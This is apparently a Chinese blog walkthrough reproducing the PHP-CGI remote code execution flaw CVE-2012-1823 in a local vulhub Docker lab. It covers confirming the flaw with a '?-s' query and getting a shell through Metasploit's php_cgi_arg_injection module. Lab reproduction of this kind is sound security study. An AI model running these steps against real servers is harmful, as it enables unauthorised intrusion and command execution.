CVE-2012-1823漏洞复现

进入下面目录/home/kali/vulhub/php/CVE-2012-1823

启动docker

bash 复制代码
sudo docker-compose up -d

可以看到已经启动了。

在浏览器输入http://127.0.0.1:8080/

可以看到正常启动了。在浏览器输入http://127.0.0.1:8080/?-s

说明是有漏洞的。

在控制台输入msfconsole,等一会。

输入search php cgi

注意看第24条exploit/multi/http/php_cgi_arg_injection。执行

bash 复制代码
use exploit/multi/http/php_cgi_arg_injection

设置rhost , rport ,查看options

运行run

进入shell,可以使用ls cd pwd whoami等命令。

参考

PHP-CGI远程代码执行漏洞(CVE-2012-1823)漏洞复现 - Junglezt - 博客园

相关推荐
Hrain-AI4 小时前
2026 编码智能体三强对比:Trae/Qoder CN/CodeBuddy 安全护栏
人工智能·安全
cjy_15 小时前
2026人工智能产业发展深度剖析:落地化、垂直细分、安全合规成行业核心赛道
人工智能·安全
数据知道5 小时前
反序列化漏洞:Java、PHP、Python 三条线各讲透
java·网络·python·安全·网络安全·php
宏集科技-鲁工5 小时前
挣脱线缆束缚:宏集EXOR X5 Wireless无线手持HMI如何让光伏工地AGV操控更安全高效
安全
听你说326 小时前
推进具身智能安全评测:丈八科技与季华实验室达成战略合作
人工智能·科技·安全
盗理者8 小时前
AI Agent 技能分享|从零实现一个 MCP Server,让 AI Agent 安全调用内部系统
网络·人工智能·安全·agent
leagsoft_10039 小时前
浙江某机器人创新企业:一体化终端、数据与身份安全实践
安全·机器人
摸鱼停不住先生9 小时前
不安全反序列化利用篇(三):从对象字段到危险方法调用
java·服务器·网络·安全
能年玲奈喝榴莲牛奶9 小时前
资产和漏洞管理系统(AI)
人工智能·安全·web安全
国际云,接待11 小时前
云服务器 SSH 被扫爆了怎么办:安全组、密钥登录与 Fail2ban 的完整加固清单
服务器·安全·ssh